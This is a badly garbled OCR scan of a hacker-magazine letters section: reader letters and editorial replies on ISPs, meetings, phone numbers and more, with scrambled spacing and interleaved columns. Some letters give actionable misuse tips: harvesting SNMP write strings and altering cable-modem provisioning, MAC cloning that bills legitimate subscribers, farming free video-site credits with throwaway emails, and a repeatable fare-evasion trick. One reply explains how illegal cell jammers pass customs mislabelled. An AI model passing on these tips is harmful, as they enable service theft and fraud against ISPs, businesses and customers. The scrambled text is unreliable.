si nce i f i t reboots you' l l hiYe to i nput the setti ngs There are al so much more powerfu l nllwor ki ng
ai n i f tl ori gi nal sllti ngs aren' t provi s i oned i nto the tool s such as Sol arWi nd's Iroadband Engi neer's
la
[C J

2 %a
[
aZnC
Tool set, whi ch is geared more towards I SP network
operators. Among the favori te tool s of mi ne i n t hi s
su i te wou l d have t o be the DNS Audi tlSNMP Sweep/
IP Browser/RF Subscri ber's Detai l s/MI B Tabl e Browser.
That's pretty much a l l you'd need out of t hi s su i te
unl ess you j ust want to go on and pack up a DB wi t h
every si ngl e devi ce's HFC MAC, fi re up Sonar out
of that s ui te, and l et i t scan al l of the subnets. You
wi l l want to have a l l of the SNMP stri ngs for t hi s step
actual l y. Admi n/ReadIWri te stri ngs so you can reap
every s i ngl e devi ce off your I SP. But be warned the
DB can reach s i zes of 8GB or so . . . i t's better to j ust
stop as soon as it reaches 300MB or i t's gonna be a
bi tch to open in most cases. Or maybe i t's j ust my
crappy puter.
There are so many ways you can expl oi t your I SP.
They usual l y have a central server for each area or
possi bl y j ust one mai n central server where the provi
si oni ng i s done. A buddy of mi ne used to have access
to the I SP provi si oni ng server where we cou l d l ogi n
and change t he up/downstream rates on each provi
si oned modem. Even account i nfo was accessi bl e. You
cou l d get away wi th i ncreasi ng a fri end's servi ce rate
t hrough t hi s provi s i oni ng server and he wou l dn't be
bi l l ed for the extra speed/bandwi dth si nce they don't
keep bi l l i ng i nfo and provi si oni ng on the same server
or, much l ess, synched wi th the i nfo from each other.
But they woul d reset hi s speed back to the defaul t
speed it was on if he was l ate and gave them a reason
to di sabl e hi s cabl e servi ce. However, you can al so
add new modem HFC MAC I Ds i nto the system but
that'd probabl y rai se a fl ag i n some department.
Most I SPs are i nsecure l i ke thi s because ei ther they
don' t care, or there's j ust a l ack of money to update
each town they're provi di ng I nternet servi ces to, or
they j ust owe the town too much i n franch i se fees,
etc. to the poi nt where they're maki ng the customers
i n that town pay for i t by h i ki ng the servi ce costs up,
whi ch probabl y l eads to more pi ssed off customers
who j ust go on and cut t hei r servi ce wi th them and
t hen go back onl i ne wi th a hacked set up and rape
them bandwi dth wi se. I t's even worse when they start
meter i ng bandwi dth because a cl oner can possi bl y
generate through a l l of these MACs and cons ume al l
of the bandwi dth t hat was set for t hat modem's MAC
and the l egi t owner for that MAC ends up payi ng for
the excess bandwi dth used. Th i s type of si tuati on i s
goi ng on up i n Canada on Rogers. Road Runner i s
al so doi ng experi ments on havi ng metered servi ces
so watch out !
I f there's more i nterest generated from t hi s l etter or
the 2 5 : 2 "Expl or i ng Road Runner's I nter nal Network"
arti cl e, I may go on and make a ni ce bi g fat art i cl e on
how easy i t i s to get on each I SP. But I ' m not sure i f
t hat'd be a good i dea. After al l , these I SPs may have
some tech that reads t hi s mag and woul d probabl y
shut these hol es but, hey, i t's actual l y so easy we
woul dn' t mi nd the cha l l enge of seei ng what t he I SP
tri es t o do t o cl ose these hol es up once a l l t hat i nfo
has been brought to t hei r attenti on. Or maybe they
j ust al ready know and don't real l y care whi ch is the
case most of the ti me.
macnutzj
We have a feeling this all too hriefletter only touches
upon what' really out there. Thanks for writing.
mi nutes, downl oads, and streami ng rental s from the
aebn. net servi ce.
I ' l l start off by gi vi ng you an exampl e promo
si te (set up your query on googl e l i ke t hi s:
aebn. net "your free gi ft"
http://promo. aebn. netl
Put in your 1 0mi nutemai l . com address, create
your account, and you can now rack up mi nutes,
downl oads, and renta l s.
Modi fy the query l i ke t hi s: si te: promo. aebn. net
"your free gi ft" and add these quotes:
" 1 5 mi nutes"
"1 downl oad to own"
"1 streami ng renta l "
" 1 downl oad"
Some may ask for a password, query the si te
that's offer i ng the promo, and add "code" in the
search. Someti mes i t's embedded i n a banner so don't
bother too much; not every si te uses the promo code
system.
Sti l l want more? Check out the t op sect i on: ni ne
l anguages - ni ne more opportuni t i es to search wi th i n
each secti on a nd googl e t h e transl ated si te: promo.
aebn. net "your free gi ft" versi ons.
So far, my account has 4000 mi nutes, 40 down
l oads to own, and 50 streami ng rental s . Pl easure
yoursel ves over the summer, boys and gi r l s!
R3tODD
We regret that your letter wasn 't actually printed
until after the summer hut we're sure our readers will
adjust.
Dear Z0.
Where I ori gi nal l y come from, they sti l l have ol d
buses. Ti ckets for the trai n ar e va l i dated by machi nes
but when you go to take the i ndi vi dual buses, i t's
a l l done by the bus dri ver. I roni ca l ly, t hi s wea kness
comes wi th technol ogy bei ng used. I recentl y moved
to a l arger ci ty for job opport uni t i es and ri ght away I
noti ced t hei r much more advanced bus technol ogy.
I t's no l onger l eft squarel y up to the bus dri ver
to exami ne your one ti me passes here. On the stand
al one buses, they have mach i nes that do the val i da
ti on. When a pass i s put i n the machi ne, i t wi l l veri fy
the pri nted marki ngs on the pass to see if i t's sti l l va l i d.
I f t he pass hasn't been used, there wi l l be no marki ngs
of date and ti me. The machi nes pri nt date, ti me, and
when the ti cket expi res when you i nsert i t i nto the
machi ne. You can buy these passes i n ten packs or you
can al ways get a month l y pass whi ch costs a fort une
( $70 or so) . The t en packs have tear-away t i ckets. One
day I was i n a hurry for the bus and tore out a t i cket.
Unfortunatel y, when I went to put i t i n the machi ne, i t
di dn't accept i t. The mach i ne reported that there was
an error and that I di dn't i nsert the t i cket i n the ri ght
di recti on. I have a habi t of doi ng thi s al l the ti me, so
I went to put the t i cket i n agai n, but i t was rejected
agai n. I then l ooked at the ti cket and there was a sma l l
c h u n k mi ssi ng because i t di dn't tear away perfect l y. I
j ust pl ayed it cool and was l i ke, "Why won' t t hi s take
my ti cket?" The bus dri ver l ooked and I showed h i m
that I was i nsert i ng t h e ti cket properl y. I sa i d, " I j ust
took t hi s ti cket out of my pack. I t's new! See! " I then
showed hi m the ti cket wi th no mar ki ngs and he l et me
on the bus. He di dn't t ake the ti cket from me though!
I wasn' t overl y surpri sed because, u nl i ke t he l ast ci ty I
Dear Z0. l i ved in, the bus dri vers here aren' t used to i nteracti ng
Wi t h regards t o the arti cl e about 1 0mi nutemai l . wi th the t i cket val i dati on. I f i t's i nval i d, the machi ne
com i n 2 5 : 1 , here's a good way t o rack up free won't take i t and they j ust deny you access. I t's defi -
ulumn 2d
l[
C JO
n i tel y a weak poi nt i n t hei r secur i ty though. Si nce that
day I have used t he same t i cket around si x ti mes. I
al ways pul l the same tri ck ( wi th the same t i cket) . I t
hel ps i f they're real l y busy wi th l ots of peopl e because
they want to r ush you through, but i t's worked every
t i me. I j ust pl ay i t cool and pl ay dumb. Do the whol e,
" Hey my t i cket won' t work - I don't suppose it cou l d
be because of t hi s tear?" Then they j ust wave me on
the bus. I t's qui te awesome when i t's $3. 75 a ri de. I
suppose i t's more of a soci al engi neer i ng tri ck t han a
hack. I a l so suppose I ' m j ust cheap but it works and
i t saves me enough f or an extra beer t hat day and I ' m
content wi th that.
So, i f you are al so too poor for publ i c transporta
ti on and your ci ty uses a s i mi l ar system, gi ve i t a try
and maybe even get an extra beer that day.
Bus boy
At some point you're going to run into the same
driver when pulling this scam. They may not remember
right away but eventually you will become the equiva
lent of a folk legend within bus driver circles. Just be
sure you have an escape route for the day they finally
crack the ticket tearing caper.
Meetin
g
Issues
Dear Z0
We had some questi ons that came up in l ast
month's meet i ng and I j ust remembered to ema i l on
it. Our group has been ta l ki ng about tryi ng to start a
l aser project for a whi l e now and some of the guys
wondered i f i t was agai nst any 2600 r ul es to do fund
ra i si ng for t he project. I thi nk the i dea was to make
some Fargo 2600 s hi rts and sel l them at a s l i ght profi t
to the peopl e who came to the meet i ng wi th the i ntent
of spendi ng the profi ts on parts to bui l d our l aser. We
had al ready pl anned on maki ng s hi rts and sel l i ng
them at cost, whi ch I woul dn't i magi ne woul d be a
probl em but I wanted to check on that anyway and
then the whol e fundrai s i ng i dea came up so i t seemed
l i ke a good ti me to wri te to you.
I n summary, i s i t a l l ri ght for us t o make " Fargo
2600" s hi rts and sel l them for a sl i ght profit to fund
ra i se for a group proj ect. And i f not, i s i t OK to sel l
them at cost? Thanks!
Jem Tal l on
Fargo 2600
This is fine with us as long as it' s for a good cause
and done in a positive spirit. And contrary to the
rumor, it's not a requirement whenever making shirts
that mention 2600 or the meetings to send us three
of them (either M, L, XL or L, XL, XXLJ . SO don 't feel
obligated to do that. Our address is on page 65 in
case you do.
close proximity who will take an interest. If you think
your area has potential, then your priority should be
getting the word out in whatever way you can. One
technique which has worked in the past is to make
up flyers and insert them into copies of 2600 that are
sitting on your local bookstore's shelves. It takes a lot
of patience and word of mouth to get a good meeting
started. Be sure to read the gUidelines located at
http: //www. 2600. com/meetings/guidelines. html and
email us updates at meetings@2600. com so we know
you're still in existence. Good luck!
Dear Z0
I have been attendi ng my l ocal 2600 meet i ng for
al most t hree years now. I t's qu i te big wi th a regu l ar
attendance of 1 0- 1 5 every month . I have mai l ed i n
t h e past as t o why we are not on t h e offi ci al meet i ngs
l i st, but got no response. So agai n I am tryi ng to get
us put on it.
I am not sure i f our group has been noti ced, but
we have a si te: http: //www. br um2 600. netl
Al so, every year we hol d a one day conference
cal l ed Brumcon. Th i s year we had a number of
members of the Chaos Computer Cl ub come from
Germany to gi ve tal ks.
Any advi ce/i nfo wou l d be grateful l y recei ved.
DrF
This leads us to an issue which pops up every now
and then and for which we've been unable to find an
easy solution. As stated i n t he guidelines mentioned
in the previous letter (which you should have gotten
an automated copy of when you emailed us), our
meetings take place on the first Friday of the month.
You've scheduled yours for the first Saturday. It may
seem like a stupid and bureaucratic reason not to list
a meeting but there is a degree of logic behind this
policy If we had both Friday and Saturday meetings, it
wouldn't be that big a deal to define each meeting as
one or the other. We came close to doing this at one
point only to be told that those who couldn't attend
our normal Friday evening meetings due to religious
observances (a somewhat sizable number) would be
doubly pissed that we'd be excluding them by having
Saturday as the alternate day. That meant a third day
would have to be a possibility too.
Then we started hearing from people who felt the
weekend in general was a bad time and we started
getting requests for meetings on the third Tuesday or
for the last Monday afternoon of the month. Apart
from the printing nightmare this would create on
our already crammed meeting page in the magazine,
having meetings on so many different days would
make it very difficult to remember which day was
"2600 meeting day, " something we haven 't had a
problem with since the inception of the meetings over
Dear Z0 20 years ago because they've consistently been held
I j ust was i ntroduced to 2600 and bought my on the first Friday of the month.
fi rst copy and read i t. I 'd be i nterested i n attendi ng a We know there will always be people for whom
meet i ng, but there are none feasi bl y cl ose. I th i nk i t Friday evening i s inconvenient or even impossible. I f
woul d be cool to start a meet i ng i n the upstate New we tell these people it' OK to have meetings on a
York area ( Al bany/Saratoga/Gl ens Fal l s) , but don't different day, invariably this will set up a conflict with
know where to start or if there is even anyone around other people i n that area who don't have a problem
here wi th an i nterest. I may attend the meet i ng i n with the standard day or with others who want yet
Bur l i ngton, Vermont, but wi th gas pri ces how they are another day of the month. Then it becomes a power
( and t i me constrai nts wi t h school outsi de of s ummer) , struggle as to which group of people will dominate
i t won't be feas i bl e to dri ve out there every mont h. and before you know it there are factions and multiple
Robert meetings. As always, we're open to ideas and sugges-
Meetings tend to work best in metropolitan areas tions on ways to make this work for everyone - or at
where there ar e likely a number of people i n fairly least for as many as possible. We believe the s
y
stem
l[
C J
2%
[
ZmC
has worked quite well over the years as is, but if
there' a way to include others without causing confu
sion, we're open to it. As you can see below, there are
other instances of this.
Dear 2600:
We wou l d j ust l i ke you to know that l ast Thursday
we had our fi rst offi ci al meeti ng. We adverti sed the
meet i ng pl ace i n our communi ty usi ng the uni versi ty
mai l i ng l i st system to get the attenti on of as many
peopl e as possi bl e. ( The economy and entertai nment
of thi s town runs around the uni versi ty communi ty. )
The meeti ngs wi l l take pl ace every fi rst Thursday
of the month at 7 pm i n the Borders Books and Musi c
coffeeshop i n the Mayaguez Mal l , Mayaguez, Puerto
Ri co.
Ri ght now we consi st of seven members, most of
them students for the el ectri cal and computer engi
neer i ng department. Some of them are undergradu
ates and others are graduates. We wi l l cont i nue to
adverti se the group as much as we can. But for the
moment that's a l l we have.
TI A
Dear 2600:
I was wonderi ng i f you cou l d provi de the contact
i nfo for the Auburn, Al abama group whi ch meets i n
"the student l ounge upstai rs i n t h e Foy Un i on Bui l di ng
at 7 pm. "
I ' m 45 mi nutes away from them and before I made
the trek, I wanted to make sure that they were meet i ng
over the summer and t hat I di dn't need a student I D to
get i nto the bui l di ng.
Eri c
We don't give out personal information for anyone
involved in meetings (or anything else) . Technically
we don't even have meeting coordinators, so anyone
attending (yourself included) would be a potential
contact. The communication angle is handled by
the attendees themselves. That 's why it's a good idea
for meetings to have web pages and forums so that
people can converse about the meetings and get
updated information.
General Questions
Dear 2600:
I recentl y had the i dea of wri ti ng an arti cl e for
you r magazi ne but, si nce i t i sn't in one of your usual
themes, I wanted t o see what you t hi nk of i t before I
put in al l the effort.
I work for CERN, the European Center for Nucl ear
Wi th the LHC ( CERN's maj or experi ment) start i ng
up t hi s summer, t her e wi l l be l ots of arti cl es about
CERN and the physi cs si de of th i ngs. t hi nk your
readers may be i nterested i n t he I T stuff as wel l .
Let me know what you thi nk.
Alex
It sounds like a fascinating idea and we'd be
eager to see what you come up with. As we say to
everyone who writes in, please write the article you're
thinking of writing and assume that we'd be interested
in running it. Obviously we can't promise anything
until we see the finished product but writing is always
better than not writing.
Dear 2600:
How anonymous i s the use of green dot cards?
Kevi n
Afer .spending a considerable amount of time
and energy trying to figure out just what your ques
tion meant, we were able to determine that green dot
cards are offered by various retail outlets in the United
States and serve as prepaid credit or debit cards. They
work in the same way except they are repleni.shed with
cash deposits which are made at the store. That and
they have a number of fees which tend to get people
aggravated. Since you need to actually receive a phys
ical card in the mail at some point. it. not something
we would consider entirely anonymous, although
with a little imagination it could be used in a much
more hidden way than a normal credit card. Green
Dot used to operate a service known as WebSecret,
which they described as "not requiring you to provide
personal information, such as social security number
and name. " Those days are apparently over as Green
Dot now requires that info for all accounts. We would
be interested in hearing what today' best methods are
for remaining anonymous while using plastic.
Dear 2600:
I am i nterested in computers and I was wonder i ng
where a good start i ng poi nt i s as far as l earni ng about
code, programs, and computers i n genera l . Any hel p
woul d be much appreci ated.
Adam
Wander through your local bookstore and find
things that make a degree of sense to you, then plunge
into them. Look for other people doing the same thing
and you'll be immersed in all kinds of material before
you know it. While classes can be good, the struc
ture and obsession with grades can be a real turnoff
to many.
Research, the l argest research center for hi gh-energy Dear 2600:
physi cs in the worl d. You may al ready know some- I forgot a n umber that you can cal l and fi nd out
thi ng about us, but i f you don't you can check Wi ki - the number that you are at. I t was l i ke l -BOO-my ansi
pedi a and I won' t bor e you wi th the detai l s . I work or somethi ng l i ke that. Pl ease hel p me.
i n the department that manages our computer center, Terry
whi ch is pretty l arge. We have about 2 B, 000 CPUs, You're thinking of the old 1 -800-MYANI-IS
about 1 2 PB of di sk storage, and more than 20PB of number. If you call it now, you'll be advised to call
tape storage, to whi ch we wi l l add 1 5PB a year. 1 0- 1 5- 1 5-800 (in actuality this is carrier access code
As you can i magi ne, managi ng a l l t hi s stuff poses 1 0 1 5 1 58 followed by two zeros to reach that compa-
some pretty seri ous probl ems. Most peopl e aren't ny' "operator" service) . This service is a huge rip-off
used to t hi nki ng on thi s ki nd of scal e, so I th i nk it charging over five dollars to reach some sort of direc-
cou l d make for i nterest i ng readi ng. I cou l d do a l i ttl e tory assistance service which has nothing t o do with
i ntroducti on on CERN, expl ai n why we do what we the above number.
do, and tal k about some of the operati onal i ssues or lust about any toll free number will have your ANI
anythi ng el se you t hi nk cou l d be i nteresti ng. I won't (Automatic Number Identification) these days. (ANI is
tal k about how to hack CERN or anyth i ng securi ty the billing number, usually the same as Caller ID which
rel ated; I don' t want to bi te the hand that feeds me. is the calling number. ) Many credit card services and
ulumn 2d l[
C J
other companies with toll free numbers will happily
read off the number they see in order to verify your
account. A good example of this is the one run by Met
at 7 -800-444-4444. Most phone company central
offices can also get you this information through the
use of ANACs, (Automatic Number Announcement
Circuits) which are usually used by phone company
technicians to find out what line they're working on.
958 and 9580 are common ones in our area but there
are many varieties of this throughout the States and
Canada. But if Caller ID is good enough for your
needs, simply calling a nearby cell phone will yield
the number you're at on its screen.
Dear Z0.
I was j ust i nqUi ri ng how much an ent i re set of
back i ssues of your magazi nes from 1 988 (that's when
you started, ri ght?) to the present woul d cost. I al so
was abl e to purchase Freedom Downtime and wh i l e I
was abl e to watch onl y part of it at my fri end's apart
ment (my DVD pl ayer i s sadl y i ncompat i bl e wi th the
fi rst di sc) , I was tru l y i mpressed at your mi ssi on. Keep
up the good work.
KNi GHT
We have al l sorts of bulk discounts at our online
store (http: //store. 2600. com) and currently the price
for every last one of our back issues is $325. (We
started in 7 984, incidentally. ) You might also want
to consider our new book which comprises an awful
lot of articles we've printed over the past 24 years.
That 's available in bookstores or at http: //www. 2600.
com/book. As for the DVD you have, there' most
always a way of playing the disc even if you run into
a player that has problems with the multiple features.
Try hitting the menu key a bunch of times or play and
stop. Sometimes the play button followed by the menu
button works. We've yet to find a player that can't play
it at all. Please contact our support people at down
time@2600. com if you continue to have problems.
Dear Z0.
My mom gave me my fi rst copy of 2600 when I
was in the s i xth or seventh grade. In the ei ghth grade,
I crashed a l oca l tech school 's network and BBS. I
know y' a l l don't condone such acti ons but, hel l , I was
young. But t hi s i sn't real l y a l etter. I t's more a ques
t i on. I wanna submi t some cover art for your hopefu l
approval and maybe usage. Where do I submi t i t?
Cou l d y' a l l j ust emai l me back, cause I wanna get i t i n
before the next i ssue?
Oxi lary
We can almost guarantee it won't make it in time
for this issue and we don't do personal responses to
letters because of the enormous amount we get. While
our covers are done in-house, we're always open to
seeing new stuf and maybe figuring out a way to
include it. You can either mail it to the physical address
listed on our staff page or email your submissions to
articles@2600. com. We appreciate your interest and
hope your system crashing days are over.
Dear Z0.
I am cur i ous as to whether you cou l d hel p me
purchase a cel l phone j ammer. Are there stores i n
t h e New York Ci ty area that sel l t hem? Or are they
compl etel y i l l egal as I 've r(ad somewhere? Any hel p
you Cdn gi ve me towards cel l phone peace and qu i et
wou l d be wonderfu l .
You won't be able to easily find a cell phone
jammer in a store in the States. That 's not to say they're
not there but, as they are illegal to sell (and own) in
the U. S. , it would be tricky at best. You shouldn't have
much of a problem finding one overseas through the
net that can be shipped to you, however. In most
cases they go through customs labeled as amplifiers
or something similar. You might wind up having to
pay some additional duty but otherwise there doesn't
seem to be much of a problem importing them. We
do suggest you use them sparingly and with a degree
of discretion.
Dear Z0.
Not sure if you t hi nk t hi s wi l l be of i nterest or
not but thought I 'd check before wr i t i ng i t up. Woul d
i t be worth publ i s hi ng an art i cl e on l egi t musi c at a
cheaper cost to peopl e outsi de t he States?
For exampl e, wi th Napster the hi ghest subscri p
t i on versi on i n the u. S. costs about $1 5 whereas i n
the U. K. i t's 1 5 pounds. S o real l y, the U. K. i s payi ng
twi ce the amount as t he U. S. Anyways, the arti cl e I ' m
t hi nki ng of wri t i ng expl ai ns how peopl e i n t he E U can
get Napster To Go for the same pri ce as the guys i n
the U. S . Nothi ng i l l egal al though I ' m sure i t breaks
some Ts and Cs.
Matt
Again, we're willing to see whatever articles people
write. While it' s kind of hard to believe it would be
that difcult to bypass the kind of billing practices you
allude to, we're always eager to see how people try to
defeat systems.
Dear Z0.
Who pays for these? Ser i ousl y, do you actual l y
make money off your quarterl i es? I j ust si t i n Barnes
and Nobl e and read them there. That's j ust me.
Andrew
Sent from my i Phone
While that ' your right, we're fortunate that not
everyone does that. If they did, then we wouldn't be
around for very long. Unlike other magaZines, we rely
solely on our readers to keep us going. Other publica
tions simply rely on advertisements . They can actually
not sell a single issue and still convince their advertisers
that people are being exposed to the ads, perhaps in
scenarios such as yours. We don 't have that luxury,
nor do we want it. You're obviously reading us for a
reason so we hope you'll see the connection between
supporting us and having the material continue to
fow.
Dear Z0.
I can't make i t to t hi s year's conference. Wi l l the
MP3s from the sessi on tal ks be posted onl i ne? Al so,
i s t hi s real l y the l ast HOPE conference? I thought I
heard/read that the Hotel Pennsyl vani a was no l onger
pl anned for renovat i on.
Steph
The MP3s are already online and the DVDs are
also available. We seem to be getting better at this as it
was all done in record time this year with more mate
rial than ever. And while the hotel is always in a state
of renovation, it:, the destruction that seems to have
been shelved, at least for now. And yes, this was the
last HOPE conference. The next one will be the next
HOPE conference. We're sorry for any confusion this
Anonymous may have caused.
la
[
C Jd
2 %a
[
aZnC
Dear 2600:
What is the poi nt of the meet i ngs?
dani el
Since we apparently won't fool you with the
obvious reason, we can tell you the real one: to
get people out of their homes on the first Friday of
the month so that the monitoring devices can be
installed.
Dear 2600:
I have been readi ng your magazi ne for several
years now and woul d l i ke to know where I can submi t
for r ank wi th i n the hacker organi zat i on. I am currentl y
a green bel t i n Braz i l i an J i u-J i tsu and an orange bel t
i n Muay Tha i . Both are very deadl y, yes, but as we
al l know i n the 2 1 st century we cannot r un around
el bowi ng peopl e i n the face or choki ng them to death .
What ranks are ava i l abl e to me as a hacker? I am not
i gnorant and compl etel y understand that you cannot
s i mpl y hand me a bl ack bel t i n hacki ng based on one
emai l . Of course, I expect to at l east start off around
green or brown bel t as I have taken severa l computer
programmi ng cl asses and can send a transcr i pt i f
necessary. I have al so hacked i nto severa l computer
systems but I cannot ta l k about i t through unencrypted
emai l . Pl ease forward t hi s emai l to the trai ni ng offi cer
of your organi zati on for i mmedi ate processi ng.
Bri an V.
Our training officer (Sensei 2600) would only
respond to this with "You begin as a beginner like
everyone else, with a white belt. A good start would
be calling me Sir. "
Proclamations
Dear 2600:
hack the el ecti on and overthrow the shadow
systems ri ggi ng of el ecti ons that have been farced for
the l ast 70 years. those that have el ected a l l of our
presi dents. i know, and i have been wi tness t o the l ast
few. you need to start everyone on el ecti ng a sma l l
party candi date (the system needs t o be hacked) .
the red and bl ue are tru l y connected. do not l et the
corporati ons and speci al i nterest and al l of ameri cas
other evi l s sel ect who r uns your country. and do not
l et them ri g another el ecti on wi t h equ i pment that you
wou l dn't l et your grandmother use. do not try to trace
t hi s message. i have ghosted an aol account.
my apologies for not si gni ng
pl ease heed my advice
thank you
Anyone who can ghost an AOL account clearly
knows what they're talking about. The hackers of the
world will take this solemll duty most seriously.
Dear 2600:
good day i hacked www.yahoo. com i t was not
mafi a boy ai m a mus l i m i l eave in the nether l ands
ci ty: heer hugowaard ai m now a good Musl i m you can
bel i eve me or not but i real l y di t i t but mafi a boy was
a fri end of me we here l i ttl e ki ds do bad thi ng who
don' t no rea l l y that ti me what we doi ng you most now
i have hacked hi s school wi th netbus but oke i don't
l i e bel i eve me so that was my story now i don't hack
any more
why i don't tel l it before i don' t no i was j ust a l i tt l e
ki d 1 3 years ol d now ai m 1 9
We can only wonder what a letter from you
when you were 13 would have looked like. Thanks
for all of the identifying information (including your
phone number) that you sent us but we think it's utter
nonsense. That's right, we don't believe you could
hack a typewriter, much less Yahoo. Of course, if you
were really good you'd hack Coogle or maybe even
the government. But we don't think you've got what
i t takes. No skills whatsoever. Of course, i f we were
wrong, we'd sure look stupid and you'd look totally
awesome. But we're not. We're right and you're lame
This should be fun.
Dear 2600:
I appl aud the return to stapl es in response to the
i nconsi stency of the format. Too bad the gl ued spi ne
never worked ri ght.
Oh, and i t's sti l l $6. 66 where I l i ve.
Trol laxor
There' something strangely reassuring in that.
Dear 2600:
Bei ng a hacker, I found some t hi ngs very di st urbi ng
watchi ng the movi e! I have been a hacker now for 1 1
years. I am I n CdC, EFF, and the Happy Hackers.
I enj oy 2600 and have for a very l ong ti me now.
Fi ve questi ons come to my mi nd and have been bot h
eri ng me now si nce day one and I have never seen
you respond to any of the quest i ons I am about to
ask.
1 .
2 .
3 .
4 .
5.
We a l l know J oh n Markoff a nd Shi momura
are i di ots ! Where and how di d they meet?
Why was Markoff there i n North Carol i na i n
the fi rst pl ace?
As I have stated above, I too am a hacker
and al so was moni tored for three years.
They too have been to my house and I was
never treated l i ke that! Questi on: Why are
they usi ng Mi t ni ck as an exampl e?
We al l know what happened t o the Home
brew Computer Cl ub. Quest i on: Why when
we al l know what happened to Roscoe are
they maki ng Mi t ni ck pay the h i gh pri ce for
bei ng a hacker when other hackers have
done other t hi ngs j ust as bad i f not worse?
As i t states i n the mani festo, "They may stop
one person but they wi l l never stop us ai L"
Why is Kevi n t hei r sol e target?
Kevi n Mi t ni ck never deserved any of t hi s and
never wi l l ! He i s a hu man bei ng and deserves t o be
treated l i ke one! Not l i ke an ani ma l !
jodi
These aren 't really new questions and in fact a few
of them are basically the same question rephrased.
But we're glad to see our film is still igniting such indig
nation after so many years. We did our best to at least
pose the important questions in our film. You'll have to
theorize on the rest or track down people who actu
ally know what the true agenda was.
Dear 2600:
I t cOll l r be that my ears are not sensi t i ve enough,
but I haven't heard much di scussi on about the
di sgracefu l l y i l l ogi ca l trend known ( somet i mes?) as
End User Secur i ty Pol i ci es. You know - those networks
( usua l l y WLANs, but someti mes actual http si tes ! ) that
require t hei r users to have some arbi trary set of "secu-
Swi nger r i ty" software i nsta l l erl on t hei r machi nes in order to

ulumn 2d
la
[
C

use a gi ven resource?
Th i s i s compl etel y outrageous. At the very l east i t
demonstrates a pi t i fu l and, mor e i mportant l y, back
wards approach to a probl em for whi ch the resource
provi der i s nei ther responsi bl e, nor at r i sk from. If an
end us er i s suffer i ng from mal ware i ssues, i t i s not the
WLAN's probl em, and the WLAN i s responsi bl e for i ts
own secur i ty. The confused pol i cy of requi ri ng users
to keep t hei r Wi ndows up to date and l aden wi th ant i
mal ware i s ambi guous about whether i t represents
some ki nd of s i l ly, forceful benevol ence, or some
fl awed measure at protecti ng i tsel f.
Equal l y i mportant is the mi stake in ass umi ng that
Wi ndows Updates and anti -mal ware make a computer
"safer." You know when you ask a sal esperson at a
major el ectroni cs cha i n if an MP3 pl ayer appl i es i ts
l ost frequency compensati on fi l ters on audi o that
has been encoded l oss l essl y, and he j ust l ooks i n the
manual and then says "I t make the sound better" ? Thi s
i s what i s happeni ng when someone tel l s you that
ant i vi rus software makes a Wi ndows machi ne more
stabl e. There is real l y no correl at i on between the two.
Stayi ng away from obvi ousl y i l l egal websi tes i s how
you avoi d gett i ng a vi rus.
Of course, most peopl e who understand t hi s
wel l enough to di scuss i t j ust say "why don' t you r un
L i nux? " Th i s i s not the poi nt. I am a Li nux user and
an XP user, and nei t her i s better. The poi nt i s t hat I
have an XP machi ne that r uns extremel y wel l , and I
am deni ed access to my own school 's (U of Toronto)
WLAN because of t hei r i ncompetence.
I want to know i f anyone i s wor ki ng on ci rcum
vent i ng t hi s nonsense. I s there any software that tri cks
the OS (or whoever's aski ng) i nto t hi nki ng you have
ant i -mal ware nonsense i nstal l ed and r unni ng?
There coul d be a real l y s i mpl e sol ut i on t hat I ' m
not aware of. Pl ease l et me know.
Jef
We hope to see an article or two on this.
Dear 2600:
I feel ki nda bad. I am a homel ess hacker and I
have been readi ng your mag si nce I was bui l di ng
desktops out of the dumpster. I l ove your mag, great
content. I onl y wi sh I di dn't have to steal i t to read i t.
I guess I cou l d j ust read i t onl i ne, but there's nothi ng
l i ke a new copy. I ' m addi cted!
Homeless Hacker
Well, as an addict, you should realize the impor
tance of paying for your next fix. You don't want to
anger the supplier.
Dear 2600:
$ 1 20 for admi ssi on to Defcon was an outrageous
pri ce, parti cu l ar l y si nce most of that cost probabl y
went i nto payi ng f or the fancy badge. Now, t hi s bei ng
a hacker's convent i on and t hat one of the events was a
"badge hacki ng contest," I deci ded to perform the u l ti
mate badge hack - I don' t need no sti nki ng badges !
My fi rst attempt was to j ust "wa l k i n" and see how
far I 'd get, wear i ng regul ar street cl othes l i ke a l l the
other attendees. I got as far as the hal l moni tors posted
at the bottom of the skybox stai rs. Next, I went back to
my room and changed i nto a pai r of bl ack sl acks and
a whi te dress s hi rt. And added t o my atti re, a green
Ri vi era cap. I t's been two days now, and I 've not been
stopped yet!
Ripping people off isn 't what hacking is about.
It's one thing to fgure out a way to defeat the system
but using it for personal gain like this is simply bad
for the community. In your case it looks like you just
managed to avoid being spotted. Not exactly high
tech but it can be effective. Keep in mind, though, that
these events cost money to put on and only survive
because people contribute. If you think it costs too
much, there are lots of other more effective ways of
letting that be known.
Help Needed
Dear 2600:
Do not publish in any way (spoken or print) .
I was wonderi ng if you knew of anyone who wou I d
be wi l l i ng t o teach me how t o program ( l anguage
uni mportant) . I understand most of the basi cs of
programi ng from work and other t hi ngs. I woul d be
wi l l i ng to pay for the ti me or I cou l d teach them about
h i gh end mappi ng. I j ust don' t want to take a cl ass
that i s based on a grade that means nothi ng more then
a l etter.
Thanks in advance.
I an
So why did we publish this despite your explicit
request? Well, first off we eliminated all geographic
info so it ' unlikely you will be found out. Second, you
sent this to our letters section which exists solely to
print letters. Third, your question deserves an answer
that others can benefit from. Please forgive us.
Obviously, we don't know people everywhere
who can teach others in their area (especially since
we totally wiped your info and no longer even know
where your area is) . But we can tell you generally that
such people abound and that you will fnd them by
going to 2600 meetings or the various conferences
that go on in the hacker world. We find that paying for
a tutor isn't all that diferent from taking a class. The
informal approach in more of a social setting tends to
have better results in our experience. You want this
to be something you look forward to, not something
that ' a chore or an obligation. If you have a real
interest in the subject matter then this shouldn't be
an issue. And don't completely eliminate the possi
bility of taking a class if it pertains to what you want
t o pursue. There i s no law that says you have t o care
about the grade you get.
Dear 2600:
I am aware that 2600, even though i t i s mai nl y an
I T magazi ne, al so publ i shes soci opol i t i cal l etters and
art i cl es. I was parti cul ar l y i mpressed wi th your Spr i ng
2002 i ssue arti cl e: Ti me To Car e. The wri ter made hi s
message cl ear: t hat both corrupti on and i ndi fference
are needed to ensure an omi nous future.
Havi ng sai d that, I wou l d l i ke to bri ng to your
attenti on a l etter wr i t i ng campai gn t o t he Uni ted
States Congress. An Ameri can col l ege gi r l , Amel i a
Fedo, has wri tten an open l etter t o t he U. S. Congress
hi ghl i ght i ng the pl i ght of Gopal an Nai r. I bel i eve she
i ntends to forward her l etter to every s i ngl e member
of Congress.
"On May 29th, 2008, Mr. Nai r publ i shed a bl og
